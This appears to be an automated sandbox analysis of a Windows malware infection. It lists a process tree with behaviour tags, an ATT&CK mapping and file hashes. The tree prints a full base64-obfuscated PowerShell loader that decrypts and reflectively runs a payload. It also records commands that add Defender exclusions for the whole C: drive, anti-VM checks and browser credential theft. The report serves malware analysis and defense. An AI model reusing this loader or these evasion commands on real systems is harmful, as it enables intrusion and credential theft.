C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2972,i,11301310715943532110,17439691935850041576,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2732 /prefetch:88⤵PID:3852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=43708 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3348,i,11301310715943532110,17439691935850041576,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3344 /prefetch:18⤵
- Uses browser remote debugging
PID:7536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --no-sandbox --remote-debugging-port=43708 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3548,i,11301310715943532110,17439691935850041576,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3336 /prefetch:18⤵
- Uses browser remote debugging
PID:6200
-
-
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq msedge.exe"6⤵
- Enumerates processes with tasklist
PID:5012
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe6⤵
- Kills process with taskkill
PID:8420
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM chrome.exe6⤵
- Kills process with taskkill
PID:8652
-
-
-
C:\Users\Admin\AppData\Local\Temp\10417120101\a0314adca1.exe"C:\Users\Admin\AppData\Local\Temp\10417120101\a0314adca1.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:8092
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10417131121\5ym0ZYg.cmd"5⤵
- System Location Discovery: System Language Discovery
PID:7200 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10417131121\5ym0ZYg.cmd"6⤵
- System Location Discovery: System Language Discovery
PID:5176 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
PID:5680 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:7836
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10417140101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10417140101\TbV75ZR.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5816 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:3612
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
PID:4924 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 6487⤵
- Program crash
PID:5692
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10417150101\qWR3lUj.exe"C:\Users\Admin\AppData\Local\Temp\10417150101\qWR3lUj.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5812 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:4716
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
PID:2416
-
-
-
C:\Users\Admin\AppData\Local\Temp\10417160101\p3hx1_003.exe"C:\Users\Admin\AppData\Local\Temp\10417160101\p3hx1_003.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4576 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'6⤵PID:6524
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵
- Command and Scripting Interpreter: PowerShell
PID:6760
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"6⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:6712 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""7⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
PID:2516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\8⤵
- Command and Scripting Interpreter: PowerShell
PID:12488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\8⤵PID:2992
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""7⤵
- Deletes itself
- Executes dropped EXE
PID:7028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10417170101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10417170101\Rm3cVPI.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4264
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2y1617.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2y1617.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"1⤵
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"2⤵PID:5876
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"1⤵
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"2⤵PID:5700
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2924
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5008
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:1744
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4924 -ip 49241⤵PID:7708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:6112
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1964
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:6788
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:4048
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:3644
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
7Windows Service
7Modify Authentication Process
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
7Windows Service
7Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
1Ignore Process Interrupts
1Impair Defenses
6Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
8Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\5809ed6b-2455-4367-9fdb-3b2d74430dca.tmp
Filesize13KB
MD5921c64a75d25ca2a01942fd6c90f7482
SHA16294c213f3b5e9875bf7aab55f1d0a971e04dcfd
SHA2563378f42918073b0a8f9d79915d6a6963876723ba7888b591448ab04e72ca818f
SHA5121b6d846eca717c28216f0a7911f84dbb616bd1e84c4c49fdba20103a138ec00a791674ef8001248a006bc5bf46e2a096456bd0b70b7b34e0ab0fad2a64483fea
-
Filesize
649B
MD5774eec50c0e452044f46a28ec6a40ba3
SHA1c978c20433dae249f51b9eac86a2a109a7ab02e7
SHA25662da0464c8717dee555bc94d93a59389d85229945e634d46e70f9f3abcaf808d
SHA5128c56e5f143a04a2b60d1a6a0780bcea3c622fd53c5b98fd632162285917b22c83da15b3e07e135e460e2ef1cdf6968fc6fb67fa446ca7da98f81f327d1690e2d
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
9KB
MD5cb1731d80187344adfc38bd722626520
SHA14f4cd74adcaf8ef88fbe6a83dcc350039d0d148d
SHA256e9beea607c49cf9bb84d7fd936588cb546d2c1913779511cebb69d70d4eab713
SHA512c5249f94d018c9334f7d9a2f0d37c1dfc09da630644efa1697049cb7bccf97266056b72712cb79841b2f0923f3f3225e8fccb1431fcd22e1482250af9cf1e6e5
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\CURRENT
Filesize16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\MANIFEST-000001
Filesize41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
81KB
MD51781a2ff9885a7161c0710cb59864079
SHA1d9c21a389c717444ffadfcdf249775dfe9ab383b
SHA256637daf38f53e09da97f646c115676d6f15a97a912b0cb37bf0ab48d062d42b74
SHA512507025c57f4cfa0b9b5db2b1d736258b66a4e994d22517a190e63f5b91ec91ae4292e64d61f391ae91c292bba786de2f5786c31283a78674b3d7cb5f6843b9ee
-
Filesize
80KB
MD55cbcad1de783c96e31173e767c3354ae
SHA1878dd1a7bf455484a9239fa8921caee7272aa6f3
SHA256f526f633599ebdcee99253a50b3ce26a020623cb9e10a15553aa8ccd80bcdb5e
SHA512120f51c99c591162a6197b010870ef74729c0ba9a3a108e77e9a090171b2af77d2c085492eee1bf6a54b801c24dbde2324a4af2ac982b0774260ad0c0f9cf6ae
-
Filesize
40B
MD520d4b8fa017a12a108c87f540836e250
SHA11ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA2566028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
Filesize
16KB
MD5d734a4d84182d33c197da9b4770e0a43
SHA1ed5f8a570af2e926a9857396be7a769b7da63a87
SHA2564636a947b080f4e9a4596ee88d733d69225790c7a8430cdc8b0563f78ba15c75
SHA512b785562efbdf0740843c5ff43edc23568920e1a3f875d671ed9f387611d15192fe926ff4cbb5fc2d7b69278aefc1e21d6660bd16f1550f9acbecc926d73e88be
-
Filesize
30KB
MD59a0bb6e7012105b371ad1b362cd61f7a
SHA10e7c3f7ac85e8591e479ebd2a574d511b906664f
SHA2566e54de18c70d44dbd620e70ad1f8f3c7c177d371047c8cb098f0f5ce464653f6
SHA5120ccc4c05364c110f63e1cbc35607c7eba1276de92918b68f00b87cd3041af8f242036f689a69ff37c8334354af242493f6a0eb065379cc16c8ce94cdec74c28f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\548e3de4-5f7a-478f-be3d-50e211f1a149\index-dir\the-real-index
Filesize1KB
MD56a09194adbffb6626fd1f884a3872b2d
SHA1071bd25a9507162b309f77950fa629fb43ebe8c7
SHA2566848683bbf51dfeb2949cbafa525f4ef261ef1f3956ce94c5f256f54f1f10257
SHA5123b545ac96a5858aa64e278bfc81d5569db72e2d088338e10d65f221861530e88ef8cc3d9981b304bdbca4b8666f4a763d24be2a8d17af985fe4da7d97bdc8b9f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\548e3de4-5f7a-478f-be3d-50e211f1a149\index-dir\the-real-index~RFe5964cb.TMP
Filesize1KB
MD50586200a7f7289f9c871aea9fcfbe122
SHA1bcca7602bbcdc6f66aef4ba7623f6f432a4996a8
SHA256e3b18e3477ccfdde629000e095193e6747d3e0a1682d2c46374bd73755a023ff
SHA512d7355570c1dcf2f0bb32fde5c4e30395a2d9966aaeea7550f3e066a1f5ed783776b303d66dbd943a5bd2be949c45aff11d89b14a1717d17235b0f94a7da32b9e
-
Filesize
40KB
MD5e22286eebcd29dc3af8fafde55bc8c80
SHA19f7760b3828e0a18d9da5318d14ea130f9bd6768
SHA2564c07e96ee0b1d825abf6a77247f7831aa503d12afd85f6751f6a5d2cb310346a
SHA512916afa4078d4d93ae7aaf36b201556734eeb01bbddf6982adcf6d716ca8d1604aee65214d5d3f338ce616386a05381606d19af44817209df4d75b21188ca2247
-
Filesize
40KB
MD59cb9ab8eef2f6bab2bf5d58f68fa5845
SHA150c60d2ae9832c1858cc80ebdb6d4fdaa7a45497
SHA2566941f28ac6d6467306ed0e18299d385bad5ea8dba8a0e3515bc5b530832831fe
SHA5122b7ddbebe1579cc9490f404e09c190b8e43c9e45e00b4f18ad553ac4d88597211c4a84c82764a00fcf12264ca92802133bff0fa89e7ba2fa23a726d104197142
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
